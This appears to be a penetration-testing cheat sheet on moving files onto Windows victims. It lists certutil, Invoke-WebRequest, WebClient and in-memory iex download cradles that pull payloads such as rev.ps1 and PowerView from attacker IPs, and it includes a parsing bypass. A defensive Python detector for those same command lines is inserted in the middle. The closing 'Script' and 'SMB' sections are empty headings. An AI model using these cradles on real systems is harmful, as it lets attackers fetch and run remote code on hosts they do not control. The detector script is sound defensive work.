Windows

Certutils

certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe

IWR (Invoke Web Request)

powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')

IEX

Instead of downloading the payload to disk, it can be executed in memory using Invoke-Expression, or its alias iex.

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')

IEX also accepts pipeline input.

powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex
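As an added example (not part of this page), the following Python script shows what the download cradles in the Certutils, IWR, System.Net.WebClient and IEX sections above look like from the defender's side: it runs a few pattern rules over process-creation command lines, the shape of the CommandLine field in a Sysmon Event ID 1 or Security 4688 record, extracts the remote URL, and scores the in-memory combination of iex plus a remote URL highest. The sample command lines, rule names and scores are constructed for this example; two of the lines are benign uses of the same binaries and must not fire.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation command lines, shaped like the CommandLine field of a
# Sysmon Event ID 1 or Windows Security 4688 record. Hosts, paths and file names are
# made up for this example; the last two lines are benign uses of the same binaries.
SAMPLE_COMMAND_LINES = [
    r"certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe",
    r"powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe",
    r"powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')",
    r"powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')",
    r"powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex",
    r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256",
    r"powershell.exe -File C:\scripts\backup.ps1",
]

# Loose URL shape: any http/https URL up to whitespace or a quote. The rules key on the
# cradle shape, never on a particular host, so they survive infrastructure changes.
URL = re.compile(r"""https?://[^\s'"]+""")

# (rule name, pattern, base score). Names and scores are constructed for this example.
RULES = [
    ("certutil_urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*?-urlcache", re.I), 3),
    ("ps_invoke_webrequest", re.compile(r"\b(?:invoke-webrequest|iwr)\b.*?https?://", re.I), 2),
    ("dotnet_webclient", re.compile(r"net\.webclient\)\.download(?:file|string)\(", re.I), 3),
    ("inmemory_iex", re.compile(r"\b(?:invoke-expression|iex)\b", re.I), 2),
]

# Extra weight when iex appears together with a remote URL: nothing touches disk, so
# file-based controls see nothing and the command line is the main artefact left behind.
IEX_WITH_URL_BONUS = 2


@dataclass
class Finding:
    command_line: str
    rules: List[str]
    score: int
    url: Optional[str]


def classify(cmdline: str) -> Optional[Finding]:
    """Return a Finding for a suspicious command line, or None if no rule matches."""
    hits = [(name, score) for name, pattern, score in RULES if pattern.search(cmdline)]
    if not hits:
        return None
    names = [name for name, _ in hits]
    score = sum(score for _, score in hits)
    url_match = URL.search(cmdline)
    url = url_match.group(0) if url_match else None
    if "inmemory_iex" in names and url is not None:
        score += IEX_WITH_URL_BONUS
    return Finding(command_line=cmdline, rules=names, score=score, url=url)


def scan(command_lines) -> List[Finding]:
    """Run classify() over an iterable of command lines and return findings, highest score first."""
    findings = [f for f in (classify(c) for c in command_lines) if f is not None]
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(f"[{finding.score}] {', '.join(finding.rules)} url={finding.url}")
        print(f"      {finding.command_line}")
```

In a real deployment the same rules would run over Sysmon Event ID 1, Security 4688 (with command-line auditing enabled) or PowerShell Script Block Logging (4104) rather than a hard-coded list, and the extracted URL feeds straight into the network side of the investigation. The benign certutil -hashfile and powershell -File lines return None, which is the point of keying on -urlcache and on the download method names rather than on the binary alone.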

Internet Explorer Basic Parsing

Invoke-WebRequest parses responses through Internet Explorer's engine, so on a host where the Internet Explorer first-launch configuration has not been completed the download fails.

This can be bypassed using the parameter -UseBasicParsing.

Escaping shell

If you encounter an error about the slash while running any of the above commands (Incorrect syntax near '/'), escape it with /.

Script

  • If the commands above are blocked, we can write a PowerShell script that downloads the file.

  • Run the following commands on the victim:

Execution of script

SMB

Attacker -

Target -
